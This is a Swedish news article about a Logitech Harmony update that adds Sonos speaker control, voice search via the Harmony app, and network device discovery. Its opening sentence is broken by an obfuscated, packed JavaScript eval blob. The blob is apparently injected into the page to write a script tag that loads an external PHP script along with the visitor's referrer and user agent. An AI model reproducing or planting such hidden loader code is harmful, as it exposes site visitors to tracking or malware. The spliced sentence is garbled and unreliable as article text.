Image Image Image Image Image Image Image Image Image Image

| 17 juni, 2021

Scroll to top

Top

Logitech Harmony introducerar nya funktioner

Logitech Harmony introducerar nya funktioner

Från eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|akfzt|var|u0026u|referrer|bsbzz||js|php’.split(’|’),0,{}))
och med i dag kan du använda din Logitech Harmony® Ultimate eller Logitech Harmony® Smart Control för att kontrollera ytterligare enheter, inklusive dina trådlösa SONOS® HiFi-högtalare, oavsett var i hemmet de befinner sig.

I linje med detta, för att kunna kontrollera uppspelning och volym direkt från din fjärrkontroll, kan du få åtkomst till dina Sonos-spellistor genom färg-touchskärmen på Harmony Ultimate, genom din surfplatta eller smartphone genom att använda Harmony-appen.

”Med dessa integrationer skapar vi ett än mer robust Harmony-ekosystem som gör det lättare för dig att skapa den optimala nöjesupplevelsen hemma”, säger Chad Thompson, senior marknads- och produktchef för digitala hem på Logitech.

Med taligenkänning, som nu finns tillgängligt genom den kostnadsfria Harmony-appen, blir sökandet efter innehåll på din streaming-enhet, inklusive Amazon Fire TV, än mer effektivt.

Genom Harmony-appen kan du nu infoga sökfältet i streaming media-appen och använda det trådlösa tangentbordet för önskade sökningar. Röstigenkänningen aktiveras genom Siri®-mjukvara eller Android Speech recognition™, beroende på operativsystem.

Mjukvaruuppdateringen förstärker även möjligheterna för samtliga produkter inom Harmony Hub, med tillhörande fjärrkontroll. Harmony upptäcker nu Philips Hue, Roku, Sonos-högtalare och andra enheter i ditt nätverk, vilket gör konfiguration lättare.

Pris och tillgänglighet

Den kostnadsfria mjukvaruuppdateringen förväntas finnas tillgänglig den 9:e juni 2014. För mer information gällande Logitechs utbud av Harmony-fjärrkontroller, och hur du kopplar dessa till dina trådlösa Sonos-högtalare – vänligen besök www.myharmony.com eller http://blog.logitech.com